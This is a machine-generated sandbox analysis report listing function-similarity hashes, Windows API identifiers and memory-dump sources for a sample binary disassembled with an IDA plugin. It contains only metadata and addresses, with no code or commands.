                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f53b80ccb5ef75a1dae41b05687c21f832e2edc0d6450a3322cda06c70b66199
                      • Instruction ID: a44f221c2dad37268e190b9744efde22fc40ae5a28114481d9c7c3390eda82b0
                      • Opcode Fuzzy Hash: f53b80ccb5ef75a1dae41b05687c21f832e2edc0d6450a3322cda06c70b66199
                      • Instruction Fuzzy Hash: 6161E533A78B8586D656CB34A941D68A7ADAF51780BA49731ED4FA3251FF3CB093C300
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CriticalSection$EnterLeave
                      • String ID:
                      • API String ID: 3168844106-0
                      • Opcode ID: b6ee9a698db5019510b0d6012d81891d5616e9b8cfbf37290707eb3bf70785f2
                      • Instruction ID: a74bf4f4da393759ae3ec2490b75c43a1129bd1c71072bb66bb6b9e8e0277fa0
                      • Opcode Fuzzy Hash: b6ee9a698db5019510b0d6012d81891d5616e9b8cfbf37290707eb3bf70785f2
                      • Instruction Fuzzy Hash: A7210A23B7868242EBA48779AA9167D1364EB89780F552631DE0C43E9AFD1CD4938A04
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: ContextInitialize$AddressEnabledErrorFeaturesHandleLastModuleProcState
                      • String ID: InitializeContext2$kernel32.dll
                      • API String ID: 4102459504-3117029998
                      • Opcode ID: 1d0405cc6862edbe8c41d68b259fdfff7295b98a7fa69f2940811987415577ac
                      • Instruction ID: 11f14c962c2dc24a1fa551d8a610f463955c19a37e107a18786c6092c552f852
                      • Opcode Fuzzy Hash: 1d0405cc6862edbe8c41d68b259fdfff7295b98a7fa69f2940811987415577ac
                      • Instruction Fuzzy Hash: 22316123A2C78682FA429B51F900239A3A4FF84791F080A35D98DC37A4FF7CE596C710
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Thread$AddressContextErrorLastLibraryLoadProcResumeSuspend
                      • String ID: QueueUserAPC2$kernel32
                      • API String ID: 3714266957-4022151419
                      • Opcode ID: 2dbf54c5f01aca65eb66055d7c9b48153e42cdf8f1605713f2bb3803d5304220
                      • Instruction ID: 797f85bc960d09dc45aace8de18f1992d1064573585873c79bf8b42438c4c1f8
                      • Opcode Fuzzy Hash: 2dbf54c5f01aca65eb66055d7c9b48153e42cdf8f1605713f2bb3803d5304220
                      • Instruction Fuzzy Hash: 7431B262A2CA8281FA51DB16F9503792765BF44BE4F441B30E9AEC76E4FF2CE546C700
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: SwitchThread
                      • String ID:
                      • API String ID: 115865932-0
                      • Opcode ID: 6f50f619f5677876c274c0d5cfccc22aae5b953314ac535087d293ad13c19e88
                      • Instruction ID: 91450fec8686362c6288a328d3b29a5f6d80242ac9509b22b7260e14d12a3e11
                      • Opcode Fuzzy Hash: 6f50f619f5677876c274c0d5cfccc22aae5b953314ac535087d293ad13c19e88
                      • Instruction Fuzzy Hash: 3BA17B33E2C28786F7509B25AC41A7922B9AF50754F094F39EA1DC76D9FE2CF842C641
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Thread$CriticalSectionSwitch$Leave$CurrentEnter
                      • String ID:
                      • API String ID: 2584832284-0
                      • Opcode ID: 026665f2e6a653b12c3c63bc81b32e7424f24d2f9ad171fed27497865999a0b0
                      • Instruction ID: 35d26e352300a20abc70e7fff82d5158735ce852ecc8ea3bf964a4bc3b6647b1
                      • Opcode Fuzzy Hash: 026665f2e6a653b12c3c63bc81b32e7424f24d2f9ad171fed27497865999a0b0
                      • Instruction Fuzzy Hash: B3514B33E7C29386F610AB64AC5267962A9AF40714F114F3AE41DC32E1FE2DF4438B51
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Current$Thread$DuplicateExceptionFailFastHandleProcessQueryRaiseVirtual
                      • String ID:
                      • API String ID: 510365852-3916222277
                      • Opcode ID: c35da7c7bb1eddc8df587918431eb49580a9460cf0c58618425ee4440bcdca6f
                      • Instruction ID: 274a9da61f3b93999495307548ddeb4b95723aa6e36de27e9513061f277e4eef
                      • Opcode Fuzzy Hash: c35da7c7bb1eddc8df587918431eb49580a9460cf0c58618425ee4440bcdca6f
                      • Instruction Fuzzy Hash: 34118B73A08B818AD760EF25A4411DA7360FB457B4F140339E6BE8BBD6DF39D4828B40
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: SwitchThread
                      • String ID:
                      • API String ID: 115865932-0
                      • Opcode ID: 003e41ce845c6e76dd1595ef84ef0d82e09a65307b701c4711c633a64d6611b4
                      • Instruction ID: fb20d35bbdb2b6fa08ad9d56abb22eff102e05fbe78615a3dbddd06d54a18a4e
                      • Opcode Fuzzy Hash: 003e41ce845c6e76dd1595ef84ef0d82e09a65307b701c4711c633a64d6611b4
                      • Instruction Fuzzy Hash: 88814B33F6C3838AF6549B25AC4163922A9AF40754F294B39D91CC72D9FE2DF843CA41
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9789bc1a6d09f2778f192f378db96bc015f8b2fdc2add68277cdec284b113d04
                      • Instruction ID: b5cb1bbe4e810ed5251f0c5a40337b8e190682115089e9f89a80027b38196761
                      • Opcode Fuzzy Hash: 9789bc1a6d09f2778f192f378db96bc015f8b2fdc2add68277cdec284b113d04
                      • Instruction Fuzzy Hash: F271A423A7D78281EA509B62AA0027967B9BF54B94F1C0F35DA5DC7799FF3CE4528300
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CriticalSection$EnterLeave
                      • String ID:
                      • API String ID: 3168844106-0
                      • Opcode ID: 82ef3b1ae6863399bee2c66c65ea360d63d7699ced2380568c227ba709139a42
                      • Instruction ID: 30e933b8a7f1ecebb9482ff4a2f0c69162cd25d97bd6be45e496f444a73c82ce
                      • Opcode Fuzzy Hash: 82ef3b1ae6863399bee2c66c65ea360d63d7699ced2380568c227ba709139a42
                      • Instruction Fuzzy Hash: 09E1AE63B2AA9685DA148F64E9506B873A5FF047E4F914B32D93D97BD8EF2CD016C300
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: ExceptionFailFastRaise
                      • String ID: Process is terminating due to StackOverflowException.
                      • API String ID: 2546344036-2200901744
                      • Opcode ID: 22eae19d51626ff98ec7988839692c0e8d7f4141dc708fb73d8230e261e0c955
                      • Instruction ID: 10a72768534bf99d75bd17bda5156f6378ebfa8e7e97cd68534d937021c09888
                      • Opcode Fuzzy Hash: 22eae19d51626ff98ec7988839692c0e8d7f4141dc708fb73d8230e261e0c955
                      • Instruction Fuzzy Hash: 93518163F28A92D1EF508B16E55027823B4EF48B84F444B32DA1ED7BD1EF2DE4568740
                      APIs
                      • LoadLibraryExW.KERNEL32(?,?,?,?,0000019C19400000,00007FF67DCF312D,?,?,00000000,00007FF67DCDFB1C,?,FFFFFFFF,47AE147AE147AE15,00007FF67DCC96CC), ref: 00007FF67DCF3082
                      • GetProcAddress.KERNEL32(?,?,?,?,0000019C19400000,00007FF67DCF312D,?,?,00000000,00007FF67DCDFB1C,?,FFFFFFFF,47AE147AE147AE15,00007FF67DCC96CC), ref: 00007FF67DCF309C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: GetEnabledXStateFeatures$kernel32.dll
                      • API String ID: 2574300362-4754247
                      • Opcode ID: ced567418731d23f9377d669990a1db323048f10ce97e0985dd48ca2feda27c8
                      • Instruction ID: dd09dadedcc4fc17cc26b1d0d672406622f26722cae4c263eb570c80a5e540ba
                      • Opcode Fuzzy Hash: ced567418731d23f9377d669990a1db323048f10ce97e0985dd48ca2feda27c8
                      • Instruction Fuzzy Hash: 5721DF53F3D15252FFB98225E4523F912A9DB14394F848A3AD94EC26C8FD3DE9828A00
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: GetEnabledXStateFeatures$kernel32
                      • API String ID: 2574300362-4273408117
                      • Opcode ID: 961ca09cc273ed846eb79f745425e20624b81655657b3af4e2e057f3e8045729
                      • Instruction ID: 50d64b690a7f3ab90e190c9dd69e858c5d8740417240c7104ffb364692d2b172
                      • Opcode Fuzzy Hash: 961ca09cc273ed846eb79f745425e20624b81655657b3af4e2e057f3e8045729
                      • Instruction Fuzzy Hash: 0CE04F56F2660281FE976B51AC452741361BFA9781FC84D75C85E823C0FD3CA29A8B21
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: GetEnabledXStateFeatures$kernel32
                      • API String ID: 2574300362-4273408117
                      • Opcode ID: 869582206f43eca24559094eab6fe15c23c738a8a7efbf45dea2c1b540028bbd
                      • Instruction ID: c4b684fc0b4bc50407032662fdc0dac616cc26998189edc9568fbbe1663a4f8b
                      • Opcode Fuzzy Hash: 869582206f43eca24559094eab6fe15c23c738a8a7efbf45dea2c1b540028bbd
                      • Instruction Fuzzy Hash: A6E0860AF2674281FE5BBB116C4127513617F45780FC84974C85E82380FE3CE65A8B21
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: SwitchThread
                      • String ID:
                      • API String ID: 115865932-0
                      • Opcode ID: f81b44ca407e1e5d81ab00286879b2029b408ee6f06e20b8608e09e3068c38cd
                      • Instruction ID: f6f5bdce7d978c7403363f1eb7d83d14d77924a5e7a3cf5476e174bc7dda2b78
                      • Opcode Fuzzy Hash: f81b44ca407e1e5d81ab00286879b2029b408ee6f06e20b8608e09e3068c38cd
                      • Instruction Fuzzy Hash: 97419AB3A3855685EB648A26C04217D67ECFB44FD4F248B3AD61EC67C9ED2CE4438740
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: SwitchThread
                      • String ID:
                      • API String ID: 115865932-0
                      • Opcode ID: 2577ca00420cad04640812f17fa9d31e80a39f04fb8df81fc5ef277dc4df519d
                      • Instruction ID: 6d2c90368f0237041e7dad2f528bec419d3ce3a7ba7ea870ba2ebb240440b47d
                      • Opcode Fuzzy Hash: 2577ca00420cad04640812f17fa9d31e80a39f04fb8df81fc5ef277dc4df519d
                      • Instruction Fuzzy Hash: BC51F832E7829386F6549B359D4167962E9AF40754F254B39E80EC32D1FF2CF8428621
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: BreakDebug
                      • String ID:
                      • API String ID: 456121617-0
                      • Opcode ID: 74c74103319f1d7b3111ee84ca78b4819d2ebd5451d4548c85482c5d5ca3b3b0
                      • Instruction ID: 4a46374ccb88da6b6150bec62bd237f2042334bb1eb20e38173c4a47ce647754
                      • Opcode Fuzzy Hash: 74c74103319f1d7b3111ee84ca78b4819d2ebd5451d4548c85482c5d5ca3b3b0
                      • Instruction Fuzzy Hash: DA41C363A2D78981EA619B11E0023796BFCAF45B98F891A34DE0CC7395EF7CE4438300
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: BreakDebug
                      • String ID:
                      • API String ID: 456121617-0
                      • Opcode ID: f4503846e52881753d47da5e2b1402b1181e9a572cdd2fa657359faf4ca4e1cb
                      • Instruction ID: c5e2136f3f0132e373beb0671bbbd286dde472068c88b3b08a330f9358f36d87
                      • Opcode Fuzzy Hash: f4503846e52881753d47da5e2b1402b1181e9a572cdd2fa657359faf4ca4e1cb
                      • Instruction Fuzzy Hash: 7E319523E5C74282EA655F55A4412B9A7F8FF44B94F2C0A35DA4D87799EF3CD8428310
                      APIs
                      • WaitForMultipleObjectsEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67DCB64B1), ref: 00007FF67DCBADB4
                      • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67DCB64B1), ref: 00007FF67DCBADBE
